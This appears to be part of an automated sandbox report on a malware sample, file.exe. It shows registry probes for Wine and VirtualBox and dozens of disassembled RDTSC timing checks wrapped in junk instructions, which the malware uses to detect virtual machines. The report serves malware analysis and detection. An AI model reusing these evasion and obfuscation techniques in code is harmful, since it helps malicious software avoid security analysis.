Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF16ED second address: BF16F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3471 second address: BF3488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FF2D4D13D46h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3488 second address: BF3492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3492 second address: BF34A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FF2D4D13D48h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF34A5 second address: BF34AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF34AB second address: BF34CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF353D second address: BF3541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3541 second address: BF3591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FF2D4D13D48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jne 00007FF2D4D13D52h 0x0000002a push 00000000h 0x0000002c movsx edx, bx 0x0000002f push 6C83CCA7h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push edi 0x00000038 pop edi 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3591 second address: BF3661 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF2D4EC6CB5h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 6C83CC27h 0x00000012 sbb si, DD5Ah 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FF2D4EC6CA8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 mov edi, dword ptr [ebp+122D2262h] 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c or di, D490h 0x00000041 pop esi 0x00000042 push 00000003h 0x00000044 call 00007FF2D4EC6CB5h 0x00000049 add ecx, dword ptr [ebp+122D3637h] 0x0000004f pop esi 0x00000050 call 00007FF2D4EC6CA9h 0x00000055 push eax 0x00000056 jp 00007FF2D4EC6CA8h 0x0000005c pop eax 0x0000005d push eax 0x0000005e jmp 00007FF2D4EC6CB4h 0x00000063 mov eax, dword ptr [esp+04h] 0x00000067 jmp 00007FF2D4EC6CB4h 0x0000006c mov eax, dword ptr [eax] 0x0000006e jmp 00007FF2D4EC6CABh 0x00000073 mov dword ptr [esp+04h], eax 0x00000077 pushad 0x00000078 jng 00007FF2D4EC6CACh 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3759 second address: BF3819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF2D4D13D52h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007FF2D4D13D4Ah 0x00000013 jmp 00007FF2D4D13D4Ah 0x00000018 pop edx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FF2D4D13D48h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 mov edx, dword ptr [ebp+122D2ADDh] 0x0000003b call 00007FF2D4D13D49h 0x00000040 jmp 00007FF2D4D13D56h 0x00000045 push eax 0x00000046 jnl 00007FF2D4D13D5Eh 0x0000004c mov eax, dword ptr [esp+04h] 0x00000050 jnl 00007FF2D4D13D58h 0x00000056 mov eax, dword ptr [eax] 0x00000058 push eax 0x00000059 push edx 0x0000005a jns 00007FF2D4D13D4Ch 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF396B second address: BF3985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 jmp 00007FF2D4EC6CACh 0x0000000d pop ecx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3985 second address: BF3A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D373Ah], ebx 0x0000000d push 00000000h 0x0000000f push DAF43CADh 0x00000014 push ebx 0x00000015 pushad 0x00000016 jmp 00007FF2D4D13D58h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e pop ebx 0x0000001f add dword ptr [esp], 250BC3D3h 0x00000026 clc 0x00000027 push 00000003h 0x00000029 xor dh, FFFFFF85h 0x0000002c push 00000000h 0x0000002e and ecx, dword ptr [ebp+122D2C61h] 0x00000034 mov dword ptr [ebp+122D1DC6h], edx 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FF2D4D13D48h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 push E94410BEh 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3A01 second address: BF3A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3A13 second address: BF3A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF2D4D13D46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3A1D second address: BF3A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 294410BEh 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FF2D4EC6CA8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov si, C695h 0x0000002d lea ebx, dword ptr [ebp+124553B2h] 0x00000033 mov edx, dword ptr [ebp+122D207Fh] 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b jmp 00007FF2D4EC6CABh 0x00000040 jmp 00007FF2D4EC6CAEh 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 jnc 00007FF2D4EC6CACh 0x0000004e push esi 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06990 second address: C06997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C139E4 second address: C139EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C139EE second address: C139F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13E5A second address: C13E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4EC6CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13E76 second address: C13E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FF2D4D13D46h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13F88 second address: C13FA3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF2D4EC6CA6h 0x00000008 jmp 00007FF2D4EC6CB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1410E second address: C14116 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14116 second address: C1412C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2D4EC6CB0h 0x00000008 jmp 00007FF2D4EC6CAAh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14400 second address: C14416 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007FF2D4D13D4Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C148A7 second address: C148C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4EC6CB6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C148C1 second address: C148C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C148C5 second address: C148CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C148CB second address: C1490F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2D4D13D59h 0x0000000c jmp 00007FF2D4D13D52h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF2D4D13D4Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1490F second address: C1491F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2D4EC6CB2h 0x00000008 jnp 00007FF2D4EC6CA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15057 second address: C1505B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1518C second address: C151D8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF2D4EC6CA6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jbe 00007FF2D4EC6CA6h 0x00000013 jmp 00007FF2D4EC6CADh 0x00000018 push edx 0x00000019 pop edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007FF2D4EC6CB8h 0x00000023 pushad 0x00000024 popad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 popad 0x00000028 push ecx 0x00000029 push eax 0x0000002a pop eax 0x0000002b pop ecx 0x0000002c popad 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C151D8 second address: C151FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF2D4D13D55h 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FF2D4D13D46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C151FC second address: C15202 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15347 second address: C1535F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4D13D54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1535F second address: C1537A instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2D4EC6CA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FF2D4EC6CADh 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C157D4 second address: C157DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C157DD second address: C157EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD64CA second address: BD64D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD64D0 second address: BD64D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD64D6 second address: BD64DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD64DA second address: BD64E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1CA0B second address: C1CA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FB9D second address: C1FBA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FBA8 second address: C1FBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF2D4D13D51h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FBC0 second address: C1FBC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FBC6 second address: C1FBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FBCA second address: C1FBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FD46 second address: C1FD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FF2D4D13D46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FD56 second address: C1FD5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FD5A second address: C1FD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF2D4D13D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FD66 second address: C1FD7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CAFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FD7A second address: C1FD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1FD80 second address: C1FD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2006B second address: C20084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D4Ch 0x00000007 jg 00007FF2D4D13D46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C20238 second address: C2024D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2D4EC6CA6h 0x00000008 jns 00007FF2D4EC6CA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2037D second address: C20381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23132 second address: C23136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23136 second address: C2314A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2D4D13D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2314A second address: C23159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23159 second address: C23163 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF2D4D13D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23163 second address: C2316A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2316A second address: C23181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jne 00007FF2D4D13D48h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23465 second address: C2346B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C235E9 second address: C235EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C236C8 second address: C236CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23CC8 second address: C23CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23CCC second address: C23CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF2D4EC6CA8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov esi, 7B96F2CEh 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f pop eax 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23CFE second address: C23D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2D4D13D51h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23D13 second address: C23D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23EB5 second address: C23ECF instructions: 0x00000000 rdtsc 0x00000002 je 00007FF2D4D13D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2D4D13D4Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23ECF second address: C23ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2420C second address: C24212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C242AE second address: C242D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF2D4EC6CB6h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C242D3 second address: C24305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 add si, 36DBh 0x0000000e push eax 0x0000000f pushad 0x00000010 jne 00007FF2D4D13D5Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C24305 second address: C24309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C25219 second address: C2521F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C250D9 second address: C250EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007FF2D4EC6CB4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2521F second address: C25223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C250EB second address: C250EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
